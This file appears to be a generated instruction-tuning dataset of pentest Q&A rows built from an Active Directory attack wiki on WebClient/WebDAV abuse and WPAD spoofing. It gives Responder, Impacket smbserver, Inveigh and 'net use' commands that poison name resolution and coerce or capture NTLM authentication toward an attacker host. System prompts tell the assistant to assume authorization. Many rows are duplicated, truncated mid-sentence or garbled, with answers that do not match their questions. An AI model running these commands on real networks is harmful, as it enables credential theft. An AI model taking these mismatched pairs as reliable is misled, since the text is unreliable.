testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WebClient abuse (WebDAV) - Abuse from multicast poisoning?", "response": "In a different way, under certain conditions it is possible to force a WebDAV authentication from a multicast poisoning. Indeed, according to this article from Synacktiv, if the WebClient service is running on a machine, it is possible to obtain a WebDAV authentication from a multicast poisoning, instead of an SMB one, by changing the error code returned.\n\nIn fact, as explained in the article, Responder normally ends the authentication exchange with a STATUS_ACCESS_DENIED status code in the context of the SMB exchange, closing the connection immediatly. However, by changing the code to STATUS_LOGON_FAILURE (0xc000006d) or STATUS_BAD_NETWORK_NAME (0xc00000cc), the SMB client will not immediatly close the connection and will attempt to fallback to the WebDAV client (if the WebClient service is running).\n\nBelow, an example to perform the attack with Responder (Python). At the time of writing, this pull request must be used.\n\n``bash\nresponder --interface \"eth0\" -E\n`\n\nAlternatively, by default, smbserver.py (Python) from Impacket ends the communications with STATUS_LOGON_FAILURE.\n\n``bash", "metadata": {"corpus_index": 897, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the responder command for webclient abuse (webdav) - abuse from multicast poisoning"}, {"role": "assistant", "content": "responder --interface \"eth0\" -E"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the responder command for webclient abuse (webdav) - abuse from multicast poisoning", "response": "responder --interface \"eth0\" -E", "metadata": {"corpus_index": 898, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "responder"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WebClient abuse (WebDAV) - Abuse from multicast poisoning?"}, {"role": "assistant", "content": "responder --interface \"eth0\" -E"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WebClient abuse (WebDAV) - Abuse from multicast poisoning?", "response": "responder --interface \"eth0\" -E", "metadata": {"corpus_index": 898, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `responder --interface \"eth0\" -E`?"}, {"role": "assistant", "content": "This command is used for webclient abuse (webdav) - abuse from multicast poisoning. Abuse from multicast poisoning"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `responder --interface \"eth0\" -E`?", "response": "This command is used for webclient abuse (webdav) - abuse from multicast poisoning. Abuse from multicast poisoning", "metadata": {"corpus_index": 898, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Start smbserver in a first terminal with authentication required work?"}, {"role": "assistant", "content": "python3 smbserver.py $NAME . -smb2support -username notexist -password notexist"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Start smbserver in a first terminal with authentication required work?", "response": "python3 smbserver.py $NAME . -smb2support -username notexist -password notexist", "metadata": {"corpus_index": 899, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Start smbserver in a first terminal with authentication required"}, {"role": "assistant", "content": "python3 smbserver.py $NAME . -smb2support -username notexist -password notexist"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Start smbserver in a first terminal with authentication required", "response": "python3 smbserver.py $NAME . -smb2support -username notexist -password notexist", "metadata": {"corpus_index": 899, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Start Responder in a second terminal?"}, {"role": "assistant", "content": "responder --interface \"eth0\"\n``\n\nThe obtained authentications from multicast poisonings in Responder will come from WebDAV, in case the WebClient service is running on the targets.\n\n::: details\nAs indicated in the article, limitations are present on this attack, and not all the functionalities involving SMB operations on a Windows machine will result in the SMB client automatically falling back to WebDav.\n\n> During our research, we were able to confirm that the following actions do trigger the behaviour:\n>\n> - Running a dir command targeting a non-existing SMB share in Windows cmd.\n> - Running the net use command targeting a non-existing SMB share in Windows cmd.\n> - Trying to access a non-existing SMB share from the file explorer interface.\n> - Trying to access a non-existing SMB share from a browser (such as Edge), or trying to load a non-existing SMB resource from a web page rendered by a browser.\n> - Searching for a non-existing SMB share in the \"map network drive\" browsing window.\n> - Searching for a non-existing SMB share from the \"add network location\" window.\n>\n> However, some other functionalities (that seem to explicitly expect to handle SMB operations that could not be related to any kind of WebDav functionality) did not result in the SMB client falling back to WebDav, for instance:\n>\n> - Using the New-SmbMapping Powershell cmdlet.\n> - Only providing a server name (\\\\idonotexist`) but no share name in the file explorer.\n> - Clicking on \"finish\" in the \"map network drive\" window.\n> - Trying to explicitly access a network share that was previously mounted and whose name does not resolve anymore.\n>\n> _( Quentin Roland and Samuel Culeron, 26/02/2025, source)_\n:::\n\n> [!WARNING] WARNING\n> It is important to note that WebDAV authentication always needs DNS or NetBIOS resolution on the domain to work. It is therefore not possible to exploit this behaviour to obtain HTTP authentication via coercion without NetBIOS resolution, or without creating a DNS record in t"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Start Responder in a second terminal?", "response": "responder --interface \"eth0\"\n``\n\nThe obtained authentications from multicast poisonings in Responder will come from WebDAV, in case the WebClient service is running on the targets.\n\n::: details\nAs indicated in the article, limitations are present on this attack, and not all the functionalities involving SMB operations on a Windows machine will result in the SMB client automatically falling back to WebDav.\n\n> During our research, we were able to confirm that the following actions do trigger the behaviour:\n>\n> - Running a dir command targeting a non-existing SMB share in Windows cmd.\n> - Running the net use command targeting a non-existing SMB share in Windows cmd.\n> - Trying to access a non-existing SMB share from the file explorer interface.\n> - Trying to access a non-existing SMB share from a browser (such as Edge), or trying to load a non-existing SMB resource from a web page rendered by a browser.\n> - Searching for a non-existing SMB share in the \"map network drive\" browsing window.\n> - Searching for a non-existing SMB share from the \"add network location\" window.\n>\n> However, some other functionalities (that seem to explicitly expect to handle SMB operations that could not be related to any kind of WebDav functionality) did not result in the SMB client falling back to WebDav, for instance:\n>\n> - Using the New-SmbMapping Powershell cmdlet.\n> - Only providing a server name (\\\\idonotexist`) but no share name in the file explorer.\n> - Clicking on \"finish\" in the \"map network drive\" window.\n> - Trying to explicitly access a network share that was previously mounted and whose name does not resolve anymore.\n>\n> _( Quentin Roland and Samuel Culeron, 26/02/2025, source)_\n:::\n\n> [!WARNING] WARNING\n> It is important to note that WebDAV authentication always needs DNS or NetBIOS resolution on the domain to work. It is therefore not possible to exploit this behaviour to obtain HTTP authentication via coercion without NetBIOS resolution, or without creating a DNS record in t", "metadata": {"corpus_index": 900, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Start Responder in a second terminal"}, {"role": "assistant", "content": "responder --interface \"eth0\"\n``\n\nThe obtained authentications from multicast poisonings in Responder will come from WebDAV, in case the WebClient service is running on the targets.\n\n::: details\nAs indicated in the article, limitations are present on this attack, and not all the functionalities involving SMB operations on a Windows machine will result in the SMB client automatically falling back to WebDav.\n\n> During our research, we were able to confirm that the following actions do trigger the behaviour:\n>\n> - Running a dir command targeting a non-existing SMB share in Windows cmd.\n> - Running the net use command targeting a non-existing SMB share in Windows cmd.\n> - Trying to access a non-existing SMB share from the file explorer interface.\n> - Trying to access a non-existing SMB share from a browser (such as Edge), or trying to load a non-existing SMB resource from a web page rendered by a browser.\n> - Searching for a non-existing SMB share in the \"map network drive\" browsing window.\n> - Searching for a non-existing SMB share from the \"add network location\" window.\n>\n> However, some other functionalities (that seem to explicitly expect to handle SMB operations that could not be related to any kind of WebDav functionality) did not result in the SMB client falling back to WebDav, for instance:\n>\n> - Using the New-SmbMapping Powershell cmdlet.\n> - Only providing a server name (\\\\idonotexist`) but no share name in the file explorer.\n> - Clicking on \"finish\" in the \"map network drive\" window.\n> - Trying to explicitly access a network share that was previously mounted and whose name does not resolve anymore.\n>\n> _( Quentin Roland and Samuel Culeron, 26/02/2025, source)_\n:::\n\n> [!WARNING] WARNING\n> It is important to note that WebDAV authentication always needs DNS or NetBIOS resolution on the domain to work. It is therefore not possible to exploit this behaviour to obtain HTTP authentication via coercion without NetBIOS resolution, or without creating a DNS record in t"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Start Responder in a second terminal", "response": "responder --interface \"eth0\"\n``\n\nThe obtained authentications from multicast poisonings in Responder will come from WebDAV, in case the WebClient service is running on the targets.\n\n::: details\nAs indicated in the article, limitations are present on this attack, and not all the functionalities involving SMB operations on a Windows machine will result in the SMB client automatically falling back to WebDav.\n\n> During our research, we were able to confirm that the following actions do trigger the behaviour:\n>\n> - Running a dir command targeting a non-existing SMB share in Windows cmd.\n> - Running the net use command targeting a non-existing SMB share in Windows cmd.\n> - Trying to access a non-existing SMB share from the file explorer interface.\n> - Trying to access a non-existing SMB share from a browser (such as Edge), or trying to load a non-existing SMB resource from a web page rendered by a browser.\n> - Searching for a non-existing SMB share in the \"map network drive\" browsing window.\n> - Searching for a non-existing SMB share from the \"add network location\" window.\n>\n> However, some other functionalities (that seem to explicitly expect to handle SMB operations that could not be related to any kind of WebDav functionality) did not result in the SMB client falling back to WebDav, for instance:\n>\n> - Using the New-SmbMapping Powershell cmdlet.\n> - Only providing a server name (\\\\idonotexist`) but no share name in the file explorer.\n> - Clicking on \"finish\" in the \"map network drive\" window.\n> - Trying to explicitly access a network share that was previously mounted and whose name does not resolve anymore.\n>\n> _( Quentin Roland and Samuel Culeron, 26/02/2025, source)_\n:::\n\n> [!WARNING] WARNING\n> It is important to note that WebDAV authentication always needs DNS or NetBIOS resolution on the domain to work. It is therefore not possible to exploit this behaviour to obtain HTTP authentication via coercion without NetBIOS resolution, or without creating a DNS record in t", "metadata": {"corpus_index": 900, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WebClient abuse (WebDAV) - Start the WebClient service"}, {"role": "assistant", "content": "On a side note, making a remote system start the WebClient service can be done in many ways\n\n::: tabs\n\n=== Map a WebDAV server\n\nBy mapping a remote WebDAV server. This can be done by having Responder's server up and by running the net use cmdlet.\n\n```shell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WebClient abuse (WebDAV) - Start the WebClient service", "response": "On a side note, making a remote system start the WebClient service can be done in many ways\n\n::: tabs\n\n=== Map a WebDAV server\n\nBy mapping a remote WebDAV server. This can be done by having Responder's server up and by running the net use cmdlet.\n\n```shell", "metadata": {"corpus_index": 901, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out WebClient abuse (WebDAV) - Start the WebClient service during a pentest?"}, {"role": "assistant", "content": "On a side note, making a remote system start the WebClient service can be done in many ways\n\n::: tabs\n\n=== Map a WebDAV server\n\nBy mapping a remote WebDAV server. This can be done by having Responder's server up and by running the net use cmdlet.\n\n```shell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out WebClient abuse (WebDAV) - Start the WebClient service during a pentest?", "response": "On a side note, making a remote system start the WebClient service can be done in many ways\n\n::: tabs\n\n=== Map a WebDAV server\n\nBy mapping a remote WebDAV server. This can be done by having Responder's server up and by running the net use cmdlet.\n\n```shell", "metadata": {"corpus_index": 901, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does map the drive from the target WebClient needs to be started on work?"}, {"role": "assistant", "content": "net use x: http://$RESPONDER_IP/\n``\n\n=== searchConnector-ms\n\nWith a searchConnector-ms file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.\n\n`xml\n\n\n Microsoft Outlook\n false\n true\n \n {91475FE5-586B-4EBA-8D75-D17434B8CDF6}\n \n \n https://whatever/\n \n\n``\n\n=== Explorer\n\nBy opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.\n\n=== Service trigger\n\nAccording to tiraniddo's research, the webclient service is registered with a service trigger, meaning it can be started automatically in response to a specific system event.\nA simple way to start the service in an unprivileged session is by compiling and executing the following C# PoC created by klezVirus.\n\n=== SharpStartWebclient\n\nBy compiling and executing the SharpStartWebclient tool created by eversinc33\n\n=== Beacon Object File\n\nBy using the following BOF (Beacon Object File) created by outflanknl.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does map the drive from the target WebClient needs to be started on work?", "response": "net use x: http://$RESPONDER_IP/\n``\n\n=== searchConnector-ms\n\nWith a searchConnector-ms file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.\n\n`xml\n\n\n Microsoft Outlook\n false\n true\n \n {91475FE5-586B-4EBA-8D75-D17434B8CDF6}\n \n \n https://whatever/\n \n\n``\n\n=== Explorer\n\nBy opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.\n\n=== Service trigger\n\nAccording to tiraniddo's research, the webclient service is registered with a service trigger, meaning it can be started automatically in response to a specific system event.\nA simple way to start the service in an unprivileged session is by compiling and executing the following C# PoC created by klezVirus.\n\n=== SharpStartWebclient\n\nBy compiling and executing the SharpStartWebclient tool created by eversinc33\n\n=== Beacon Object File\n\nBy using the following BOF (Beacon Object File) created by outflanknl.\n\n:::", "metadata": {"corpus_index": 902, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform map the drive from the target WebClient needs to be started on?"}, {"role": "assistant", "content": "net use x: http://$RESPONDER_IP/\n``\n\n=== searchConnector-ms\n\nWith a searchConnector-ms file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.\n\n`xml\n\n\n Microsoft Outlook\n false\n true\n \n {91475FE5-586B-4EBA-8D75-D17434B8CDF6}\n \n \n https://whatever/\n \n\n``\n\n=== Explorer\n\nBy opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.\n\n=== Service trigger\n\nAccording to tiraniddo's research, the webclient service is registered with a service trigger, meaning it can be started automatically in response to a specific system event.\nA simple way to start the service in an unprivileged session is by compiling and executing the following C# PoC created by klezVirus.\n\n=== SharpStartWebclient\n\nBy compiling and executing the SharpStartWebclient tool created by eversinc33\n\n=== Beacon Object File\n\nBy using the following BOF (Beacon Object File) created by outflanknl.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform map the drive from the target WebClient needs to be started on?", "response": "net use x: http://$RESPONDER_IP/\n``\n\n=== searchConnector-ms\n\nWith a searchConnector-ms file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.\n\n`xml\n\n\n Microsoft Outlook\n false\n true\n \n {91475FE5-586B-4EBA-8D75-D17434B8CDF6}\n \n \n https://whatever/\n \n\n``\n\n=== Explorer\n\nBy opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.\n\n=== Service trigger\n\nAccording to tiraniddo's research, the webclient service is registered with a service trigger, meaning it can be started automatically in response to a specific system event.\nA simple way to start the service in an unprivileged session is by compiling and executing the following C# PoC created by klezVirus.\n\n=== SharpStartWebclient\n\nBy compiling and executing the SharpStartWebclient tool created by eversinc33\n\n=== Beacon Object File\n\nBy using the following BOF (Beacon Object File) created by outflanknl.\n\n:::", "metadata": {"corpus_index": 902, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute map the drive from the target WebClient needs to be started on?"}, {"role": "assistant", "content": "=== searchConnector-ms\n\nWith a [searchConnector-ms](https://docs.microsoft.com/en-us/windows/win32/search/search-sconn-desc-schema-entry) file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute map the drive from the target WebClient needs to be started on?", "response": "=== searchConnector-ms\n\nWith a [searchConnector-ms](https://docs.microsoft.com/en-us/windows/win32/search/search-sconn-desc-schema-entry) file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.", "metadata": {"corpus_index": 903, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== searchConnector-ms`?"}, {"role": "assistant", "content": "This command is used for map the drive from the target webclient needs to be started on. map the drive from the target WebClient needs to be started on"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== searchConnector-ms`?", "response": "This command is used for map the drive from the target webclient needs to be started on. map the drive from the target WebClient needs to be started on", "metadata": {"corpus_index": 903, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WPAD spoofing - Theory work?"}, {"role": "assistant", "content": "A proxy can be used to handle clients requests (for example to access the Internet). In a network in which the topology changes frequently, adaptive configurations are needed. A type of proxies called \"Adaptive proxies\" uses a configuration script.\n\nThe Web Proxy Automatic Discovery (WPAD) protocol helps clients in finding a proxy configuration script (wpad.dat). This script gives a set of proxies that can be used, and can be located with an hostname or an URL. Various mechanisms can be used to find its location (by order of resolution):\n\n1. WinHTTP/WinINET\n2. DHCP\n3. DNS\n4. Internet Explorer's LAN settings, or configuration file"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WPAD spoofing - Theory work?", "response": "A proxy can be used to handle clients requests (for example to access the Internet). In a network in which the topology changes frequently, adaptive configurations are needed. A type of proxies called \"Adaptive proxies\" uses a configuration script.\n\nThe Web Proxy Automatic Discovery (WPAD) protocol helps clients in finding a proxy configuration script (wpad.dat). This script gives a set of proxies that can be used, and can be located with an hostname or an URL. Various mechanisms can be used to find its location (by order of resolution):\n\n1. WinHTTP/WinINET\n2. DHCP\n3. DNS\n4. Internet Explorer's LAN settings, or configuration file", "metadata": {"corpus_index": 904, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for WPAD spoofing - Theory"}, {"role": "assistant", "content": "A proxy can be used to handle clients requests (for example to access the Internet). In a network in which the topology changes frequently, adaptive configurations are needed. A type of proxies called \"Adaptive proxies\" uses a configuration script.\n\nThe Web Proxy Automatic Discovery (WPAD) protocol helps clients in finding a proxy configuration script (wpad.dat). This script gives a set of proxies that can be used, and can be located with an hostname or an URL. Various mechanisms can be used to find its location (by order of resolution):\n\n1. WinHTTP/WinINET\n2. DHCP\n3. DNS\n4. Internet Explorer's LAN settings, or configuration file"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for WPAD spoofing - Theory", "response": "A proxy can be used to handle clients requests (for example to access the Internet). In a network in which the topology changes frequently, adaptive configurations are needed. A type of proxies called \"Adaptive proxies\" uses a configuration script.\n\nThe Web Proxy Automatic Discovery (WPAD) protocol helps clients in finding a proxy configuration script (wpad.dat). This script gives a set of proxies that can be used, and can be located with an hostname or an URL. Various mechanisms can be used to find its location (by order of resolution):\n\n1. WinHTTP/WinINET\n2. DHCP\n3. DNS\n4. Internet Explorer's LAN settings, or configuration file", "metadata": {"corpus_index": 904, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WPAD spoofing - Practice"}, {"role": "assistant", "content": "WPAD spoofing can be combined with\n\n* LLMNR and NBT-NS spoofing\n* DHCP poisoning combined (or not) with DNS spoofing\n* ARP poisoning or DHCPv6 spoofing, followed by DNS spoofing\n\n> [!TIP]\n> Proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with --wredir and --ProxyAuth\n> * forced and relayed with ntlmrelayx by using the --http-port 3128 argument"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WPAD spoofing - Practice", "response": "WPAD spoofing can be combined with\n\n* LLMNR and NBT-NS spoofing\n* DHCP poisoning combined (or not) with DNS spoofing\n* ARP poisoning or DHCPv6 spoofing, followed by DNS spoofing\n\n> [!TIP]\n> Proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with --wredir and --ProxyAuth\n> * forced and relayed with ntlmrelayx by using the --http-port 3128 argument", "metadata": {"corpus_index": 905, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WPAD spoofing - Practice?"}, {"role": "assistant", "content": "WPAD spoofing can be combined with\n\n* LLMNR and NBT-NS spoofing\n* DHCP poisoning combined (or not) with DNS spoofing\n* ARP poisoning or DHCPv6 spoofing, followed by DNS spoofing\n\n> [!TIP]\n> Proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with --wredir and --ProxyAuth\n> * forced and relayed with ntlmrelayx by using the --http-port 3128 argument"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WPAD spoofing - Practice?", "response": "WPAD spoofing can be combined with\n\n* LLMNR and NBT-NS spoofing\n* DHCP poisoning combined (or not) with DNS spoofing\n* ARP poisoning or DHCPv6 spoofing, followed by DNS spoofing\n\n> [!TIP]\n> Proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with --wredir and --ProxyAuth\n> * forced and relayed with ntlmrelayx by using the --http-port 3128 argument", "metadata": {"corpus_index": 905, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WPAD spoofing - through LLMNR, NBT-NS spoofing"}, {"role": "assistant", "content": "On old Windows systems (i.e. lacking the MS16-077 security update), the WPAD location could be obtained through insecure name resolution protocols like LLMNR and NBT-NS when standard DNS queries were failing (i.e. no DNS record for WPAD). This allowed attackers to operate LLMNR and NBT-NS spoofing to answer those WPAD queries and redirect to a fake wpad.dat file, hence poisoning the web proxy configuration of the requesting clients, hence obtaining more traffic.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n* The -w/--wpad option will make Responder start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients.\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n``bash\nresponder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP\n`\n\n=== Windows\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes (even from machine accounts) and set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh).\n\n* Inveigh starts a WPAD rogue proxy server by default.\n* Options like -WPADAuth, -WPADAuthIgnore, -WPADIP, -WPADPort, -WPADResponse (and others) can be used to tweak the WPAD abuse.\n\n`\nInvoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334"}], 